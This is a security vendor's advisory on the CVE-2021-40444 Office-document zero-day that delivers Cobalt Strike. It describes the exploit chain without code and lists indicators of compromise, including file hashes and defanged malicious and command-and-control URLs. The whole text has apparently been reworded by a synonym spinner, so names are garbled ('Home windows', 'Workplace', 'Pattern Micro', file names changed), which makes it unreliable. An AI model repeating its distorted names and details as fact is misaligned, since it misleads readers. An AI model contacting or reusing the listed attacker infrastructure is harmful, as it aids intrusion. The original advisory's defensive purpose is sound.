[ad_1]
Distant Code Execution Zero-Day (CVE-2021-40444) Hits Home windows, Triggered Through Workplace Docs
Exploits & Vulnerabilities
Microsoft has disclosed the existence of a brand new zero-day vulnerability that impacts a number of variations of Home windows. This vulnerability (designated as CVE-2021-40444) is at the moment delivered by way of malicious Workplace 365 paperwork and requires consumer enter to open the file to set off.
By: Pattern Micro
September 09, 2021
Learn time: ( phrases)
Microsoft has disclosed the existence of a brand new zero-day vulnerability that impacts a number of variations of Home windows. This vulnerability (designated as CVE-2021-40444) is at the moment delivered by way of malicious Workplace 365 paperwork and requires consumer enter to open the file to set off. It ought to be famous that by default, Workplace paperwork downloaded from the web are opened both in Protected View or Utility Guard, each of which might mitigate this specific assault.
If the attacker is ready to persuade the sufferer to obtain the file and bypass any mitigation, it could set off the vulnerability and trigger a malicious file to be downloaded and run on the affected machine. At present, this vulnerability is used to ship Cobalt Strike payloads.
Microsoft has issued an official bulletin overlaying this vulnerability. This weblog entry discusses how the exploit may match, in addition to Pattern Micro options.
Now we have obtained a number of samples of paperwork that exploit this vulnerability. The paperwork all comprise the next code within the doc.xml.rels file of their package deal:
Determine 1. Code with XML relationships
Word the presence of a URL (which we’ve got eliminated) that downloads a file titled facet.html (SHA-256: d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6). This file contained obfuscated JavaScript; the picture in Determine 2 exhibits a part of the deobfuscated code.
Determine 2. Deobfuscated JavaScript code
A number of actions might be seen on this code: it downloads a .CAB file, extracts a .DLL file from the mentioned .CAB file, and makes use of path traversal assaults to run the file (which is called championship.inf).
Ultimately, this results in the execution of the championship.inf file, as seen under:
Determine 3. Properties for execution of payload
This payload is a Cobalt Strike beacon (SHA-256: 6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b), which we detect as Backdoor.Win64.COBEACON.OSLJAU. As is often the case with Cobalt Strike, this might enable an attacker to take management of the affected system. The malicious Workplace information are detected as Trojan.W97M.CVE202140444.A, with the malicious .CAB file detected as Trojan.Win64.COBEACON.SUZ.
As we famous earlier, Microsoft has but to launch an official patch. We reiterate our long-standing recommendation to keep away from opening information from surprising sources, which might significantly decrease the danger of this risk because it requires the consumer to truly open the malicious file.
We are going to replace this publish as needed if extra info turns into obtainable. Updates on Pattern Micro options might be discovered on this data base web page.
Indicators of Compromise
SHA-256
File Description
Detection Title
1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00
Payload (CAB)
Trojan.Win64.COBEACON.SUZ
5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185
Exploited Doc
Trojan.W97M.CVE202140444.A
3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf
199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745
a5f55361eff96ff070818640d417d2c822f9ae1cdd7e8fa0db943f37f6494db9
6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b
Payload (DLL)
Backdoor.Win64.COBEACON.OSLJAU
d0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6
Downloaded JS
Trojan.JS.TIVEX.A
URL
Class
hxxp://hidusi[.]com/
Malware Confederate
hxxp://hidusi[.]com/e273caf2ca371919/mountain[.]html
hxxp://hidusi[.]com/94cc140dcee6068a/assist[.]html
hxxp://hidusi[.]com/e8c76295a5f9acb7/facet[.]html
hxxp://hidusi[.]com/e8c76295a5f9acb7/ministry[.]cab
hxxps://joxinu[.]com
C&C Server
hxxps://joxinu[.]com/hr[.]html
hxxps://dodefoh[.]com
hxxps://dodefoh[.]com/ml[.]html
hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html
hxxp://sagoge[.]com/
Malware Confederate
hxxps://comecal[.]com/
hxxps://rexagi[.]com/
hxxp://sagoge[.]com/get_load
hxxps://comecal[.]com/static-directory/templates[.]gif
hxxps://comecal[.]com/ml[.]js?restart=false
hxxps://comecal[.]com/avatars
hxxps://rexagi[.]com:443/avatars
hxxps://rexagi[.]com/ml[.]js?restart=false
hxxps://macuwuf[.]com
hxxps://macuwuf[.]com/get_load
Tags
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
[ad_2]